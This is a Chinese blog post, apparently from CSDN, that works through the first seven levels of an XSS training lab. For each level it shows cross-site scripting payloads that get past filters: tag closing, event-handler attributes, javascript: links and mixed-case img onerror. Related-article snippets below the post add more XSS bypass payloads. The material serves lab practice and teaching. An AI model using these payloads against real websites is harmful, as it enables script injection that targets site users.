XSS闯关练习

最新推荐文章于 2024-04-30 05:17:19 发布
最新推荐文章于 2024-04-30 05:17:19 发布
阅读量439 收藏 2
点赞数 1
分类专栏: XSS闯关练习
我是Alsn,那半个橘子是海上遇到大雨时侯的明亮橘色灯塔!
本文链接:https://blog.csdn.net/Alsn86/article/details/113695650
版权

XSS闯关练习

第一关
在这里插入图片描述
在这里插入图片描述

</h2><script>alert(111)</script>直接弹
在这里插入图片描述
在这里插入图片描述
第二关
在这里插入图片描述
有两个位置回显,但是其中一个位置对特殊字符做了转义,所以我们对另一个位置(input标签)下手
在这里插入图片描述
111"><script>alert(123)</script>
在这里插入图片描述
第三关
在这里插入图片描述
双引号和尖括号被转义了
在这里插入图片描述
无法闭合标签 只能在input标签内部xss了,
123’οnmοuseοver='alert(123)
在这里插入图片描述
当鼠标滑过输入框时,成功弹框
在这里插入图片描述
第四关
在这里插入图片描述
在这里插入图片描述
尖括号被过滤了 所以还是只能在标签内部xss
123123" οnmοuseοver=“alert(123)
在这里插入图片描述
鼠标滑过输入框时成功弹框
在这里插入图片描述
第五关
在这里插入图片描述
script和onxxxxx都被过滤了
在这里插入图片描述
使用a标签绕过
123”><a href=javascript:alert(123)>点我</a>
点击a标签后 弹框
在这里插入图片描述
第六关
script onxxxxxx href src都被过滤了
在这里插入图片描述
尝试大小写绕过成功弹框
123123"><img sRc=1 OnerrOR=alert(123)>
在这里插入图片描述
第七关
href onclick onerrer…src 都被过滤了
在这里插入图片描述
尝试双写绕过成功
123123">
在这里插入图片描述
第八关

Alsn86
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss闯关小游戏.zip
02-25
这是一款利用xss漏洞闯关的小游戏,无需连接数据库,共20关,非常适合网络安全攻防的初学者练习使用,使用及安装教程请看此链接,https://editor.csdn.net/md?articleId=104496122 欢迎各位小伙伴下载
我的渗透笔记之XSS绕过技巧
xf555er的博客
03-03 1万+
1、单引号、双引号和尖括号之间的闭合。 有些标签例如,构造的payload应该为” >,那么组成的标签为<input value=""><script>alert(1)</script>" 2、尖括号被转义,利用注释符号和一些属性事件. 例如,构造payload为" οnclick=alert(1)//,组成的标签为<input value="" o...
XSS-Game 通关教程,XSS-Game level1-18,XSS靶场通关教程_xss靶场level
最新发布
2401_84186109的博客
04-30 631
3)第三步:弹窗测试,回车即可弹窗,自动进入下一关。4)从源码可以看到,第一关没有任何过滤。​​​​​​​​。
xss尖括号等被转义情况下的绕过测试
z1moq的博客
07-25 1万+
打开靶场 目标网站存在反射型xss漏洞,我们使用常用的方法进行测试 发现并无作用,打开网站源码查看问题情况 确实后端会将用户输入的数据无过滤直接返回前端,但是存在个别符号被转义的问题,导致无法正常弹窗 通过查找资料可知,可以通过使用三重url编码的方式绕过这一问题 尝试使用此方法进行绕过 emmmmmmm发现并不行 尝试使用编码绕过 发现也被转义了 既然无法实现转义的绕过,就再次仔细观察前端页面代码 发现在form表单中也会直接显示,并且发现 value 的值是由单引号闭合,且单引号在前几次测
记一次XSS攻击绕过
zkaqlaoniao的博客
10-27 368
最近一直在看国外的赏金平台,绕waf是真的难受, 记录一下绕过的场景。
xss绕过尖括号和双括号_XSS绕过<>进行测试
weixin_42406749的博客
01-30 5069
大家都知道,普遍的防御XSS攻击的方法是在后台对以下字符进行转义:、’、”,但是经过本人的研究发现,在一些特殊场景下,即使对以上字符进行了转义,还是可以执行XSS攻击的。首先看一个JS的例子:Default1234vars="u003cu003e";alert(s);运行这段代码,结果显示如下:看到这么熟悉的尖括号,大家会不会有一些兴奋的感觉呢?JS代码中并没有出现尖括号,可是运行时却输出了尖括号...
xss闯关挑战
11-09
这个是XSS闯关文件,解压后放在服务器的对应文件夹即可。 闯关笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如...
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
XSS20关练习源码
09-04
本资源是“XSS20关练习源码”,提供了20个PHP文件,用于帮助学习者理解和防范XSS攻击。** 每一关的设计可能涵盖了不同的XSS攻击类型和防御策略,包括但不限于以下内容: 1. **反射型XSS**:这种XSS通常源于用户...
xss challenge 下载 xss 实践通关小游戏,以闯关的形式检验xss掌握程度。
04-27
xss challenge 下载 xss 实践通关小游戏,以闯关的形式检验xss掌握程度。
xss闯关详解
m0_73189964的博客
06-25 1265
xss前18关详解
(27)【xss绕过】一般测试步骤、绕过方法:触发事件、干扰、编码……
04-03 6086
XSS绕过-合集】
xss绕过方法
sinri的博客
01-30 3539
xss绕过方法 1.改变大小写 将大小写穿插编写 <script>alert(“xss”);</script> 可以转换为: <ScRipt>ALeRt(“XSS”);</sCRipT> 2.关闭标签 利用大于号>关闭标签使得xss生效 ><script>alert(“Hi”);</script> 3.利用html标签触发事件 很多标签都可以对过滤进行绕过 格式:< 标签 事件 = 执行语句 例如: <p
XSS常见的触发标签
热门推荐
LYJ20010728的博客
05-06 1万+
无过滤情况 <script> <scirpt>alert("xss");</script> <img> 图片加载错误时触发 <img src="x" onerror=alert(1)> <img src="1" onerror=eval("alert('xss')")> 鼠标指针移动到元素时触发 <img src=1 onmouseover="alert(1)"> 鼠标指针移出时触发 <img src=1 onm
反射xss触发技巧之引号转义逃逸
nextlubricate的博客
12-05 3613
不少xss防御机制较为成熟,但是引号转义却不转义转义符的情况,仍然可以进行逃逸并触发反射xss ,以最近的搜狗反射xss为例来讲(已修复) https://xxx.xxx.com/hospital/ncp/guide.html?channel=hainan\%27;alert(1);// 此处的单引号被转义,然而在单引号前加上转义符,可以导致单引号逃逸,成功闭合,触发反射xss ...
[ 常见漏洞篇 ]常见web漏洞总结------XSS绕过方式
qq_51577576的博客
12-06 3706
本文具体写到了常见的XSS绕过方式,间的的介绍了一下修复方式 写的比较细,比较深,需要一定的基础才能看懂,仔细读完 不懂的可以百度查一查或者私信我,相信会有很大收获 目录 一、Xss绕过方式: 1. 前端过滤 2.双写绕过 3. 事件绕过 4. 大小写绕过 5. 注释干扰绕过 6.伪协议绕过 7.空格回车Tab绕过 8. 编码绕过 1. base64编码: 2. JS编码: 3. 十六进制: 4. unicode: 5. HTML实体编码: 6. URL...
XSS-labs(1-10)闯关详解
m0_46467017的博客
07-25 2784
通过查看可以知道本关与上一关的不同,在于转换后的内容不同,虽然添加了大小写转换,但是因为转换后,字符被转换为空字符,所以转换后的字符如何仍可以组合成,那么就可以绕过该防御机制。进入第八关后,发现无法构造闭合,采用是采用了htmlspecialchars($str)函数,而且闭合方式是双引号,所以input中无法注入,但是在连接里面是有地方可以注入的。右键查看源代码,发现我们输入的>,.........
xss闯关(1-20)
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
06-10 586
XSS(Cross-Site Scripting)是一种常见的Web攻击技术,攻击者通过注入恶意代码,使得在用户访问受到攻击的网站时执行并影响用户的浏览器。XSS攻击通常被用于盗取用户信息、会话劫持、篡改网站内容等非法目的。
[第二章 web进阶]xss闯关 1
04-10
XSS是指跨站脚本攻击。它是一种利用Web应用程序中的漏洞,向用户的浏览器中注入恶意代码的攻击方式。攻击者通过注入恶意代码,可以窃取用户的敏感信息,甚至控制用户的电脑。在Web应用程序中,应该采取安全措施,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值